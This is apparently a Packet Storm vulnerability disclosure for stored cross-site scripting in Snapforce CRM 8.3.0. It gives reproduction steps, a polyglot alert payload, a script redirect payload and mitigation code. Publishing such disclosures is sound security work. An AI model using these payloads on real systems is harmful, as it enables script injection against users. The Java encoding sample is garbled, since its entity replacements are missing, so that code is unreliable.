exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Snapforce CRM 8.3.0 Cross Site Scripting

Snapforce CRM 8.3.0 Cross Site Scripting
Posted Aug 22, 2019
Authored by Prasad Lingamaiah

Snapforce CRM version 8.3.0 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 403447c47a23972c08fcd81b4ca4c307c382f8f88d26a94eda5723546375a418

Snapforce CRM 8.3.0 Cross Site Scripting

Change Mirror Download
Hello Team,

Greetings. there is list of xss vulnerabilities and Concurrent login
vulnerabilities are in snapforce
<https://crm.snapforce.com/prodigy/login.php?timeout> (version 8.3.0)
application.



*Vulnerability List: *

1. Stored Cross Site Scripting

2. Stored Cross Site Scripting thorough UI Redirection.

3 Concurrent Login are Allowed

*Effected URL: *

https://crm.snapforce.com/prodigy/login.php



*Steps to reproduce:*

1.Login to application using https://crm.snapforce.com/prodigy/login.php

2. Goto the Accounts creation location and create new Account.

3. Fill all required parameters and insert XSS payload in description
location and save it.

4. once you saved the xss payload in description location cross site
scripting payload can execute.

5. application can redirect to attacker application my case i have
redirected to google.com page

6. for more information please see attached file



*Payloads:*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<script>document.location='https://google.com'</script>

*Mitigation:*

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.owasp.org_index.php_XSS-5F-28Cross-5FSite-5FScripting-29-5FPrevention-5FCheat-5FSheet&d=DwMFaQ&c=0DdzT34RfO2GGahVO5PumQ&r=8BdtPm_N-eOWc3EZEL8jVSXu4k5FAchn6mFgL-Knnhk&m=vCgg57fKEnLqhRpyRjhiXZxSZ258jYrO_CX_VtudPYo&s=zSunO4Eh5lUFVUfM2fblWQ2XLe-woCC3pG3gz4_fb10&e=>



• Output encoding: It is recommended to implement ‘output encoding’ to
convert untrusted input into a safe form where the input is displayed as
data to the user without executing as code in the browser.



Java HTML encoding Function

public static String HTMLEncode(String aTagFragment){

final StringBuffer result = new StringBuffer();

final StringCharacterIterator iterator = new

StringCharacterIterator(aTagFragment);

char character = iterator.current();

while (character != StringCharacterIterator.DONE )

{

if (character == '<') result.append("<");

else if (character == '>') result.append(">");

else if (character == '\"') result.append(""");

else if (character == '\'') result.append("'");

else if (character == '\\') result.append("\");

else if (character == '&') result.append("&");

else {

//the char is not a special one

//add it to the result as is

result.append(character);

}

character = iterator.next();

}

return result.toString();

}



• Escaping: Escape all untrusted data based on the HTML context (body,
attribute, JavaScript, CSS, or URL) that the data will be placed into.

EASPI API

String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input"
) );



• Filtering input parameter: Positive or "whitelist" input validation with
appropriate canonicalization is the recommended filtering technique.
Alternatively, black-list filtering input works by removing some or all
special characters from your input. Special characters are characters that
enable script to be generated within an HTML stream. Special characters
include the following:

<> " ' % ; ) ( & + -

JavaScript Codefunction RemoveBad(strTemp) {

strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");

return strTemp;

}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close